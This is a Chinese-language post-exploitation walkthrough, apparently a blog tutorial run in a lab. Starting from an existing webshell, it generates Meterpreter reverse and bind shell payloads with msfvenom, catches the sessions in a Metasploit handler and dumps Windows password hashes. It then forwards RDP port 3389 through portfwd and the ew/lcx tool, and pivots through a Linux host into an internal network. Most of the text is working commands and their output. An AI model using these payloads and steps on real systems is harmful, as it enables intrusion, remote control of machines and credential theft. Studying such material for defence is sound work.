前提是拿到了windows的webshell。

  • ps:在生成payload的时候加上-b "\x00",防止发生段错误

环境

  • 攻击机: 192.168.190.1
  • WIN : 192.168.190.130

Windows渗透基本操作

现在拿到了windows的webshell,为了更好的渗透利用msfvenom生成一个马丢上去。

1
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.1 lport=5555 -f exe -o shell.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > set lhost 192.168.190.1
lhost => 192.168.190.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.190.1:5555
[*] Sending stage (179779 bytes) to 192.168.190.130
[*] Meterpreter session 1 opened (192.168.190.1:5555 -> 192.168.190.130:49295) at 2018-05-15 16:59:50 +0800
[*] Sending stage (179779 bytes) to 192.168.190.130
[*] Meterpreter session 2 opened (192.168.190.1:5555 -> 192.168.190.130:49296) at 2018-05-15 16:59:51 +0800
meterpreter >

拿到meterpreter的shell,既然是windows机器,想办法拿到3389远程连接

1
2
3
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c5d7e0c089c0:::

破解一下hash拿到明文密码

然后使用端口转发功能将目标机器的3389端口转发到本地2222端口。

1
meterpreter > portfwd add -l 2222 -r 192.168.190.130 -p 3389

换种方式,使用ew来实现,强大的ew集成了lcx的端口转发功能

在目标机执行

1
ew_for_Win.exe -s lcx_slave -d 192.168.190.1 -e 3333 -f 127.0.0.1 -g 3389

打通本地的3389端口与192.168.190.1的3333端口,然后攻击机执行

1
ew_for_Win.exe -s lcx_listen -l 3334 -e 3333

将本地请求3334的连接转交给反连3333端口的主机。

然后本地远程连接

或者使用

1
ew_for_Win.exe -s lcx_tran -l 1080 -f 127.0.0.1 -g 3389

然后我们连接192.168.190.130:1080端口即可。

windows在内网

还有一种情况就是拿到一个Linux机器,内网有个windows主机。

环境
1
2
3
攻击机:192.168.190.1
linux:192.168.190.130
windows:192.168.116.129

生成了个正向马传上去

1
msfvenom -p linux/x86/meterpreter/bind_tcp lport=5555 -b "\x00" -f elf -o shell2.elf

本地正向连过去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Payload options (linux/x86/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5555 yes The listen port
RHOST 192.168.190.128 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf5 exploit(multi/handler) > run

然后加上路由

然后通过windows的漏洞植入msf马,

1
msfvenom -p windows/meterpreter/bind_tcp lport=5555 -f exe -o shell.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 5555 yes The listen port
RHOST 192.168.116.129 no The target address

因为挂着路由的原因,直接使用

1
meterpreter > portfwd add -l 2222 -r 192.168.116.129 -p 3389

然后连接本地的2222端口即可。